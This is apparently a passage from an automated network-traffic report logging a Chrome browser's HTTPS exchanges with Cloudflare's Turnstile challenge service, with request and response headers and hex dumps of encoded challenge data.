                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:02 UTC200INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:02 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                Server: cloudflare
                                                CF-RAY: 8b62cdea0d675e7d-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 37 08 02 00 00 00 90 04 bd 36 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDR76IDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.1649758104.18.94.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:03 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:03 UTC200INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:03 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                Server: cloudflare
                                                CF-RAY: 8b62cdede8d57286-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 37 08 02 00 00 00 90 04 bd 36 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDR76IDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.1649759104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:03 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 31572
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: 2245aa7fb0a0c67
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:03 UTC16384OUTData Raw: 76 5f 38 62 36 32 63 64 64 33 32 64 39 37 31 38 62 31 3d 6d 67 30 55 73 39 56 53 4d 63 6c 35 67 4a 58 52 44 52 44 35 30 56 48 52 57 52 62 55 24 31 4a 53 52 4a 52 63 36 4f 65 67 52 63 52 32 31 4f 6c 39 56 41 57 65 70 52 4f 6a 52 56 4e 76 52 4c 4a 52 72 5a 31 56 57 52 35 6c 56 5a 6d 48 52 38 39 52 68 55 56 53 52 45 55 4e 55 55 72 72 52 30 30 65 70 66 76 38 31 39 53 41 52 39 46 58 52 58 55 37 70 52 74 43 66 48 79 44 76 55 56 46 50 24 32 32 39 52 52 4e 58 52 6d 4d 55 70 36 70 73 4c 70 52 4c 6a 38 74 72 39 69 39 52 65 67 30 75 6a 74 56 36 32 65 24 52 56 38 39 75 73 52 56 76 6a 35 48 52 4e 64 6a 37 65 6a 30 50 6a 72 65 52 30 6c 36 36 5a 6c 52 75 55 56 62 45 32 38 39 2d 6e 4b 54 63 51 70 67 6a 66 51 39 63 4c 58 79 50 24 5a 54 36 46 67 4c 37 64 44 7a 38 6c 57 6a
                                                Data Ascii: v_8b62cdd32d9718b1=mg0Us9VSMcl5gJXRDRD50VHRWRbU$1JSRJRc6OegRcR21Ol9VAWepROjRVNvRLJRrZ1VWR5lVZmHR89RhUVSREUNUUrrR00epfv819SAR9FXRXU7pRtCfHyDvUVFP$229RRNXRmMUp6psLpRLj8tr9i9Reg0ujtV62e$RV89usRVvj5HRNdj7ej0PjreR0l66ZlRuUVbE289-nKTcQpgjfQ9cLXyP$ZT6FgL7dDz8lWj
                                                2024-08-20 13:42:03 UTC15188OUTData Raw: 31 58 52 78 52 30 55 4c 31 37 4d 52 75 52 58 71 41 6c 4e 31 4a 74 74 72 75 32 52 34 36 52 30 56 72 36 50 6c 65 56 30 6e 52 71 55 39 65 52 50 65 35 31 37 70 56 4c 52 50 52 4c 58 52 6d 52 38 31 39 55 52 36 52 31 36 56 4e 52 38 52 6d 75 56 76 52 31 52 6e 36 65 53 56 5a 52 65 52 56 65 56 4b 52 4c 6b 49 73 52 51 52 6e 52 4f 31 52 53 52 2b 52 4f 44 56 51 52 4a 52 4f 30 52 6f 6a 63 52 4a 78 56 74 55 32 31 65 6c 56 68 55 56 50 59 52 39 45 52 51 52 35 55 39 54 52 56 31 56 6c 37 67 52 49 31 39 58 56 37 36 78 57 4b 31 39 49 52 66 36 4f 76 56 64 52 56 36 39 53 56 77 52 37 57 4c 7a 6a 24 31 37 4e 4c 53 52 30 52 4c 6b 77 58 6a 59 6b 65 55 57 31 56 68 55 72 77 65 4d 56 30 31 6c 55 4f 49 36 74 52 54 67 65 74 52 61 63 24 55 65 6a 52 67 36 38 77 4f 6c 37 30 52 73 32 4f 55
                                                Data Ascii: 1XRxR0UL17MRuRXqAlN1Jttru2R46R0Vr6PleV0nRqU9eRPe517pVLRPRLXRmR819UR6R16VNR8RmuVvR1Rn6eSVZReRVeVKRLkIsRQRnRO1RSR+RODVQRJRO0RojcRJxVtU21elVhUVPYR9ERQR5U9TRV1Vl7gRI19XV76xWK19IRf6OvVdRV69SVwR7WLzj$17NLSR0RLkwXjYkeUW1VhUrweMV01lUOI6tRTgetRac$UejRg68wOl70Rs2OU
                                                2024-08-20 13:42:03 UTC330INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:03 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 26344
                                                Connection: close
                                                cf-chl-gen: 3YGOei/lfvxZMxuWCSWQPxHO8+RtDsc/FoCbN/94WSHTnMGiTKfM+MSF850dgB7HL1Z2xtDjvZSz7N7r$lNYCk2l0dOLGnduD
                                                Server: cloudflare
                                                CF-RAY: 8b62cdf09f4d4379-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:03 UTC1039INData Raw: 74 34 39 33 6e 36 35 35 6e 6f 47 62 6b 61 61 48 70 61 72 49 79 4a 71 6b 6a 4d 72 4f 75 36 33 4f 30 72 37 4f 69 5a 62 43 6c 4c 57 55 7a 4e 7a 62 72 71 6d 35 34 70 7a 67 73 4b 58 6c 76 63 62 56 76 73 62 66 72 2b 2f 71 72 4c 79 73 73 36 7a 47 39 63 37 61 35 63 37 47 37 4d 66 41 32 4d 33 79 77 39 62 69 38 64 6f 4a 2b 4e 50 4d 7a 51 41 4f 7a 4f 4c 61 2f 65 59 46 42 65 4c 59 46 52 44 37 31 76 54 73 38 65 2f 73 2f 67 54 61 35 66 58 32 34 43 63 54 36 53 72 73 47 2b 2f 6f 38 52 4d 65 43 76 34 6c 41 44 55 50 4b 42 62 37 4e 51 38 71 46 52 73 78 44 55 4d 5a 41 52 5a 4a 42 68 74 44 48 68 67 73 41 6b 59 51 55 56 4a 4d 4d 78 55 4b 4f 44 56 4b 47 56 6f 6e 58 55 41 58 49 55 45 57 59 6c 41 79 4d 32 5a 6e 55 79 6c 70 4c 6a 74 61 52 55 52 51 59 53 74 70 4c 6a 4e 70 4e 33 4a
                                                Data Ascii: t493n655noGbkaaHparIyJqkjMrOu63O0r7OiZbClLWUzNzbrqm54pzgsKXlvcbVvsbfr+/qrLyss6zG9c7a5c7G7MfA2M3yw9bi8doJ+NPMzQAOzOLa/eYFBeLYFRD71vTs8e/s/gTa5fX24CcT6SrsG+/o8RMeCv4lADUPKBb7NQ8qFRsxDUMZARZJBhtDHhgsAkYQUVJMMxUKODVKGVonXUAXIUEWYlAyM2ZnUylpLjtaRURQYStpLjNpN3J
                                                2024-08-20 13:42:03 UTC1369INData Raw: 45 6d 61 57 2b 6a 4c 32 37 75 71 72 50 77 49 36 52 6a 73 4b 6e 6c 39 6d 61 6d 39 6e 62 74 61 37 5a 76 38 54 62 75 37 71 6d 76 4b 4b 72 70 63 65 6b 38 4c 6d 75 35 64 4c 73 35 38 6e 58 77 66 72 30 79 63 58 72 31 75 33 71 30 4d 37 77 77 39 50 44 42 73 62 47 76 41 76 4b 44 39 73 50 79 73 66 71 79 39 49 57 31 52 54 57 47 2b 63 45 2b 65 76 70 36 75 38 5a 44 65 2f 37 32 39 37 6e 34 66 63 43 49 43 41 73 42 2b 77 6d 42 65 51 47 4b 77 41 73 44 2f 51 37 38 76 76 7a 43 52 59 67 4c 79 49 31 4c 54 4a 45 4d 78 59 52 49 51 55 4a 43 30 73 75 43 41 30 69 50 53 4a 43 52 77 6b 33 45 55 49 78 57 53 59 5a 50 79 67 31 4f 54 30 62 58 69 51 36 4a 46 63 33 4b 6c 74 6e 54 46 64 72 4f 6a 45 72 53 6c 30 31 4c 30 35 4c 4f 54 4e 54 4f 6a 30 33 56 33 6c 42 4f 31 74 74 52 54 39 6b 52 59
                                                Data Ascii: EmaW+jL27uqrPwI6RjsKnl9mam9nbta7Zv8Tbu7qmvKKrpcek8Lmu5dLs58nXwfr0ycXr1u3q0M7ww9PDBsbGvAvKD9sPysfqy9IW1RTWG+cE+evp6u8ZDe/7297n4fcCICAsB+wmBeQGKwAsD/Q78vvzCRYgLyI1LTJEMxYRIQUJC0suCA0iPSJCRwk3EUIxWSYZPyg1OT0bXiQ6JFc3KltnTFdrOjErSl01L05LOTNTOj03V3lBO1ttRT9kRY
                                                2024-08-20 13:42:03 UTC1369INData Raw: 69 73 2b 6f 73 61 75 2b 73 61 2b 58 78 37 43 35 71 64 79 56 33 61 43 61 75 4a 76 44 33 71 48 63 78 2b 4b 6c 75 73 76 6d 72 75 54 50 36 72 4c 53 30 2b 36 32 78 74 66 79 75 2f 76 76 30 2b 67 42 74 2f 7a 53 38 2f 50 52 78 74 76 48 33 63 58 6a 39 65 41 43 2f 76 48 4b 38 2f 33 6c 35 4f 55 4e 7a 39 6e 76 35 51 2f 55 48 2f 50 65 34 74 73 45 31 2b 59 6c 2f 42 63 44 34 67 4d 4f 2f 68 30 42 47 2f 34 76 42 69 34 58 44 77 51 43 4d 68 4d 2b 47 76 6b 35 51 68 37 34 50 55 59 69 2b 45 46 4b 4a 67 74 46 54 69 73 71 52 45 4e 44 42 51 35 57 4d 7a 41 73 4d 42 67 52 4d 54 68 49 53 79 35 56 49 42 74 63 59 47 56 61 59 47 59 36 54 44 52 68 4c 57 77 75 50 45 4a 54 50 44 4e 71 4e 54 63 34 53 57 70 76 4c 31 35 55 63 6a 78 37 55 6c 74 51 54 6e 35 66 69 6d 5a 4c 68 59 35 72 61 6f 53
                                                Data Ascii: is+osau+sa+Xx7C5qdyV3aCauJvD3qHcx+KlusvmruTP6rLS0+62xtfyu/vv0+gBt/zS8/PRxtvH3cXj9eAC/vHK8/3l5OUNz9nv5Q/UH/Pe4tsE1+Yl/BcD4gMO/h0BG/4vBi4XDwQCMhM+Gvk5Qh74PUYi+EFKJgtFTisqRENDBQ5WMzAsMBgRMThISy5VIBtcYGVaYGY6TDRhLWwuPEJTPDNqNTc4SWpvL15Ucjx7UltQTn5fimZLhY5raoS
                                                2024-08-20 13:42:03 UTC1369INData Raw: 49 37 58 32 4e 4b 35 31 70 43 2b 76 4c 4f 78 34 4b 2b 74 78 71 2b 6e 74 4e 75 71 35 73 54 4a 34 75 7a 52 78 2b 58 55 35 73 58 30 72 74 6a 31 35 72 4f 38 75 73 72 30 77 41 44 64 76 65 32 2b 41 74 44 58 2f 4d 51 41 44 38 33 38 32 2b 54 52 7a 65 7a 6f 43 2b 49 4f 79 2b 38 62 2f 51 34 48 39 75 76 78 41 2b 76 36 45 2f 37 65 2b 2b 4d 44 4a 41 58 2b 4c 41 54 38 41 67 45 4a 45 77 55 67 37 53 34 6f 43 51 30 52 4d 52 6b 70 39 69 45 39 2f 69 45 46 41 78 41 39 43 55 67 71 4a 51 70 4a 49 6b 31 51 51 43 49 64 4c 53 6b 54 51 6b 38 30 45 78 6b 6d 53 54 52 51 55 44 70 68 55 44 6c 42 5a 56 51 31 53 53 51 72 62 69 30 6e 58 46 6f 78 63 6c 51 73 51 48 56 69 65 31 6c 34 4f 33 39 65 66 6b 46 71 51 59 46 75 68 33 74 51 61 44 78 61 69 34 53 46 52 59 56 6f 63 59 35 4b 6a 6c 61 48
                                                Data Ascii: I7X2NK51pC+vLOx4K+txq+ntNuq5sTJ4uzRx+XU5sX0rtj15rO8usr0wADdve2+AtDX/MQAD8382+TRzezoC+IOy+8b/Q4H9uvxA+v6E/7e++MDJAX+LAT8AgEJEwUg7S4oCQ0RMRkp9iE9/iEFAxA9CUgqJQpJIk1QQCIdLSkTQk80ExkmSTRQUDphUDlBZVQ1SSQrbi0nXFoxclQsQHVie1l4O39efkFqQYFuh3tQaDxai4SFRYVocY5KjlaH
                                                2024-08-20 13:42:03 UTC1369INData Raw: 61 65 76 72 2f 61 6f 72 4c 44 33 71 65 6c 35 2b 71 35 77 2b 4b 33 37 4f 72 65 76 61 72 4c 33 62 54 30 74 2b 57 36 73 37 7a 6c 32 4d 6a 77 2b 50 30 44 38 72 37 65 39 77 50 78 36 73 72 36 37 51 2f 34 78 68 41 41 35 66 58 6c 35 4e 2f 32 30 39 6e 71 44 41 7a 6e 48 78 76 34 41 53 4c 68 47 50 77 52 38 53 73 6c 2b 51 59 63 39 75 6f 46 2f 41 7a 77 38 41 51 75 41 77 63 43 4a 50 6b 47 4d 42 38 49 46 78 31 42 42 45 49 55 49 55 41 68 42 6a 73 61 2f 6b 77 37 48 68 6b 68 49 56 49 56 50 79 4a 51 4d 56 56 56 4b 7a 4e 63 58 53 34 70 4c 56 46 69 4f 6a 56 67 57 6c 46 63 50 30 31 49 51 57 6b 2b 53 6d 41 2b 4c 6d 34 30 4c 6e 56 30 55 46 68 30 56 55 39 76 54 6f 4a 69 57 6e 46 56 66 31 53 44 57 6e 68 4b 59 46 65 41 52 57 56 73 67 70 42 70 63 45 69 55 62 58 52 58 6d 48 46 34 56
                                                Data Ascii: aevr/aorLD3qel5+q5w+K37OrevarL3bT0t+W6s7zl2Mjw+P0D8r7e9wPx6sr67Q/4xhAA5fXl5N/209nqDAznHxv4ASLhGPwR8Ssl+QYc9uoF/Azw8AQuAwcCJPkGMB8IFx1BBEIUIUAhBjsa/kw7HhkhIVIVPyJQMVVVKzNcXS4pLVFiOjVgWlFcP01IQWk+SmA+Lm40LnV0UFh0VU9vToJiWnFVf1SDWnhKYFeARWVsgpBpcEiUbXRXmHF4V
                                                2024-08-20 13:42:03 UTC1369INData Raw: 64 76 39 65 6b 74 38 6e 70 77 4e 61 36 34 61 76 74 79 76 48 46 78 4c 2f 71 32 65 62 4a 37 66 4c 35 32 2b 2b 38 33 4d 72 32 77 4e 2f 59 2b 51 44 62 34 76 34 45 39 65 59 43 43 4f 76 6c 45 77 2f 66 38 67 76 35 42 2b 67 61 2f 65 66 34 45 68 67 4b 41 42 66 66 48 67 49 59 35 77 51 4b 48 2b 67 4d 43 53 41 67 4d 44 45 43 2f 41 55 6b 4e 76 67 69 39 7a 51 56 2b 54 77 55 50 55 41 73 45 67 30 56 45 45 63 48 52 76 77 62 47 42 59 76 42 69 52 54 48 67 77 6f 55 79 52 57 47 55 49 62 45 79 39 51 4d 55 6c 69 4e 56 30 31 50 6c 52 46 5a 47 4e 42 51 32 74 6f 54 54 6f 6e 52 56 39 69 63 56 35 33 51 44 41 35 52 56 4e 37 4f 33 39 49 67 44 35 30 54 57 56 50 63 34 46 57 57 46 36 44 52 6d 56 71 58 46 6c 70 62 6d 42 64 63 70 42 67 5a 59 69 52 63 70 65 61 66 5a 68 72 58 31 68 33 63 6e
                                                Data Ascii: dv9ekt8npwNa64avtyvHFxL/q2ebJ7fL52++83Mr2wN/Y+QDb4v4E9eYCCOvlEw/f8gv5B+ga/ef4EhgKABffHgIY5wQKH+gMCSAgMDEC/AUkNvgi9zQV+TwUPUAsEg0VEEcHRvwbGBYvBiRTHgwoUyRWGUIbEy9QMUliNV01PlRFZGNBQ2toTTonRV9icV53QDA5RVN7O39IgD50TWVPc4FWWF6DRmVqXFlpbmBdcpBgZYiRcpeafZhrX1h3cn
                                                2024-08-20 13:42:03 UTC1369INData Raw: 35 38 36 73 37 39 72 4c 73 71 72 44 37 74 4c 31 75 4d 50 45 73 38 79 76 79 2b 37 66 76 39 2f 30 77 4e 66 58 76 2b 6a 47 36 50 66 68 37 73 30 4e 43 2f 33 52 45 77 44 39 30 77 67 45 39 74 59 49 2b 78 76 36 44 41 48 54 37 78 59 63 2b 2f 34 61 43 68 49 4b 48 2f 30 4d 41 53 44 76 43 66 6f 79 48 78 38 47 4e 77 6b 58 2b 54 6f 6d 4e 77 72 32 46 78 6b 68 4d 45 41 76 50 67 41 70 53 68 38 2b 48 45 34 73 51 7a 30 45 4a 30 55 6c 54 52 4a 45 55 43 63 52 46 44 31 4b 50 55 77 62 56 6b 46 54 4e 6a 78 47 56 54 6c 6d 52 31 67 6e 59 6a 78 69 61 45 68 4c 5a 6c 5a 65 56 6d 74 4b 57 45 31 73 50 46 56 48 66 6d 74 72 55 6f 4e 56 59 30 61 47 63 6f 4e 57 51 32 4e 6c 62 58 79 4d 65 34 70 4d 64 5a 5a 72 69 6d 39 4d 62 34 31 74 6c 56 71 4d 6d 47 39 5a 58 49 57 53 68 5a 52 6b 68 49 61
                                                Data Ascii: 586s79rLsqrD7tL1uMPEs8yvy+7fv9/0wNfXv+jG6Pfh7s0NC/3REwD90wgE9tYI+xv6DAHT7xYc+/4aChIKH/0MASDvCfoyHx8GNwkX+TomNwr2FxkhMEAvPgApSh8+HE4sQz0EJ0UlTRJEUCcRFD1KPUwbVkFTNjxGVTlmR1gnYjxiaEhLZlZeVmtKWE1sPFVHfmtrUoNVY0aGcoNWQ2NlbXyMe4pMdZZrim9Mb41tlVqMmG9ZXIWShZRkhIa
                                                2024-08-20 13:42:03 UTC1369INData Raw: 2b 50 72 30 38 2f 71 32 64 66 4e 36 50 50 54 30 66 4b 38 37 65 48 32 31 63 2f 65 2b 64 6e 53 76 50 33 64 33 2b 59 44 43 4f 66 73 42 77 73 4f 38 51 76 53 31 76 49 4f 37 65 66 37 45 77 4c 76 2f 42 63 63 45 76 34 56 49 50 4d 45 48 2f 30 45 41 53 50 73 2b 78 45 6d 42 68 66 6f 4b 67 6f 69 45 79 77 30 4a 68 67 7a 45 69 6f 67 4e 7a 6f 44 48 7a 73 71 4e 69 63 2f 4c 68 77 74 51 67 78 4b 4d 45 46 4d 4a 43 39 4b 55 45 49 31 54 6a 34 30 50 56 4e 42 58 52 56 57 52 6a 51 2f 57 43 55 34 51 31 38 70 4f 45 4a 67 62 54 49 6c 4c 31 55 73 62 6d 6f 31 57 46 68 73 4f 56 42 59 63 6d 4a 67 58 58 5a 6b 51 32 42 36 52 58 4a 70 66 6b 6c 63 62 59 4a 69 63 48 43 42 6a 47 78 78 69 6c 56 6f 62 6f 36 55 68 6e 65 54 6d 47 74 56 6c 6e 61 45 68 4a 71 4b 6b 6e 32 65 70 49 79 4c 6f 6f 42 76
                                                Data Ascii: +Pr08/q2dfN6PPT0fK87eH21c/e+dnSvP3d3+YDCOfsBwsO8QvS1vIO7ef7EwLv/BccEv4VIPMEH/0EASPs+xEmBhfoKgoiEyw0JhgzEiogNzoDHzsqNic/LhwtQgxKMEFMJC9KUEI1Tj40PVNBXRVWRjQ/WCU4Q18pOEJgbTIlL1Usbmo1WFhsOVBYcmJgXXZkQ2B6RXJpfklcbYJicHCBjGxxilVobo6UhneTmGtVlnaEhJqKkn2epIyLooBv


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.1649760104.18.94.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:04 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:04 UTC379INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:42:04 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                cf-chl-out: 5TSxlAteZe6DBDGCBpN6A6n9P1igGXzBN2o=$21FnnrKvI8CCzNbF
                                                Server: cloudflare
                                                CF-RAY: 8b62cdf5bec8438b-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.1649761104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:08 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 33979
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: 2245aa7fb0a0c67
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:08 UTC16384OUTData Raw: 76 5f 38 62 36 32 63 64 64 33 32 64 39 37 31 38 62 31 3d 6d 67 30 55 73 39 56 53 4d 63 6c 35 67 4a 58 52 44 52 44 35 30 56 48 52 57 52 62 55 24 31 4a 53 52 4a 52 63 36 4f 65 67 52 63 52 32 31 4f 6c 39 56 41 57 65 70 52 4f 6a 52 56 4e 76 52 4c 4a 52 72 5a 31 56 57 52 35 6c 56 5a 6d 48 52 38 39 52 68 55 56 53 52 45 55 4e 55 55 72 72 52 30 30 65 70 66 76 38 31 39 53 41 52 39 46 58 52 58 55 37 70 52 74 43 66 48 79 44 76 55 56 46 50 24 32 32 39 52 52 4e 58 52 6d 4d 55 70 36 70 73 4c 70 52 4c 6a 38 74 72 39 69 39 52 65 67 30 75 6a 74 56 36 32 65 24 52 56 38 39 75 73 52 56 76 6a 35 48 52 4e 64 6a 37 65 6a 30 50 6a 72 65 52 30 6c 36 36 5a 6c 52 75 55 56 62 45 32 38 39 2d 6e 4b 54 63 51 70 67 6a 66 51 39 63 4c 58 79 50 24 5a 54 36 46 67 4c 37 64 44 7a 38 6c 57 6a
                                                Data Ascii: v_8b62cdd32d9718b1=mg0Us9VSMcl5gJXRDRD50VHRWRbU$1JSRJRc6OegRcR21Ol9VAWepROjRVNvRLJRrZ1VWR5lVZmHR89RhUVSREUNUUrrR00epfv819SAR9FXRXU7pRtCfHyDvUVFP$229RRNXRmMUp6psLpRLj8tr9i9Reg0ujtV62e$RV89usRVvj5HRNdj7ej0PjreR0l66ZlRuUVbE289-nKTcQpgjfQ9cLXyP$ZT6FgL7dDz8lWj
                                                2024-08-20 13:42:08 UTC16384OUTData Raw: 31 58 52 78 52 30 55 4c 31 37 4d 52 75 52 58 71 41 6c 4e 31 4a 74 74 72 75 32 52 34 36 52 30 56 72 36 50 6c 65 56 30 6e 52 71 55 39 65 52 50 65 35 31 37 70 56 4c 52 50 52 4c 58 52 6d 52 38 31 39 55 52 36 52 31 36 56 4e 52 38 52 6d 75 56 76 52 31 52 6e 36 65 53 56 5a 52 65 52 56 65 56 4b 52 4c 6b 49 73 52 51 52 6e 52 4f 31 52 53 52 2b 52 4f 44 56 51 52 4a 52 4f 30 52 6f 6a 63 52 4a 78 56 74 55 32 31 65 6c 56 68 55 56 50 59 52 39 45 52 51 52 35 55 39 54 52 56 31 56 6c 37 67 52 49 31 39 58 56 37 36 78 57 4b 31 39 49 52 66 36 4f 76 56 64 52 56 36 39 53 56 77 52 37 57 4c 7a 6a 24 31 37 4e 4c 53 52 30 52 4c 6b 77 58 6a 59 6b 65 55 57 31 56 68 55 72 77 65 4d 56 30 31 6c 55 4f 49 36 74 52 54 67 65 74 52 61 63 24 55 65 6a 52 67 36 38 77 4f 6c 37 30 52 73 32 4f 55
                                                Data Ascii: 1XRxR0UL17MRuRXqAlN1Jttru2R46R0Vr6PleV0nRqU9eRPe517pVLRPRLXRmR819UR6R16VNR8RmuVvR1Rn6eSVZReRVeVKRLkIsRQRnRO1RSR+RODVQRJRO0RojcRJxVtU21elVhUVPYR9ERQR5U9TRV1Vl7gRI19XV76xWK19IRf6OvVdRV69SVwR7WLzj$17NLSR0RLkwXjYkeUW1VhUrweMV01lUOI6tRTgetRac$UejRg68wOl70Rs2OU
                                                2024-08-20 13:42:08 UTC1211OUTData Raw: 30 31 37 55 65 32 69 43 64 4b 74 44 67 4d 75 64 44 76 72 71 75 50 74 7a 31 37 55 56 56 38 44 6e 71 75 66 47 4c 56 68 48 75 66 34 64 33 55 39 35 56 31 74 36 47 57 31 52 30 37 43 58 4a 6e 6f 53 52 67 59 79 6d 33 49 71 4e 59 77 68 33 46 71 78 59 4b 4d 44 4a 71 63 6e 73 38 46 52 2d 6d 75 52 5a 39 72 32 68 2d 54 36 56 48 37 44 6a 57 68 33 4e 55 6c 74 4a 56 52 66 45 55 77 4d 70 56 51 65 39 44 61 39 78 65 54 47 39 48 24 62 77 56 78 56 79 65 34 77 54 2d 53 31 62 56 78 77 2d 55 67 38 61 6d 71 30 61 6a 24 5a 66 41 36 68 44 56 58 63 39 32 4f 2b 31 52 48 65 55 69 4a 74 4f 4e 37 41 57 4a 50 62 61 78 43 69 76 34 39 48 68 24 67 63 65 56 44 47 62 31 67 5a 39 37 79 75 6d 30 62 56 5a 52 35 6b 76 57 52 4e 36 30 67 65 4d 56 72 33 44 6e 33 77 56 58 6b 38 44 6b 73 41 56 52 6d
                                                Data Ascii: 017Ue2iCdKtDgMudDvrquPtz17UVV8DnqufGLVhHuf4d3U95V1t6GW1R07CXJnoSRgYym3IqNYwh3FqxYKMDJqcns8FR-muRZ9r2h-T6VH7DjWh3NUltJVRfEUwMpVQe9Da9xeTG9H$bwVxVye4wT-S1bVxw-Ug8amq0aj$ZfA6hDVXc92O+1RHeUiJtON7AWJPbaxCiv49Hh$gceVDGb1gZ97yum0bVZR5kvWRN60geMVr3Dn3wVXk8DksAVRm
                                                2024-08-20 13:42:08 UTC378INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 3416
                                                Connection: close
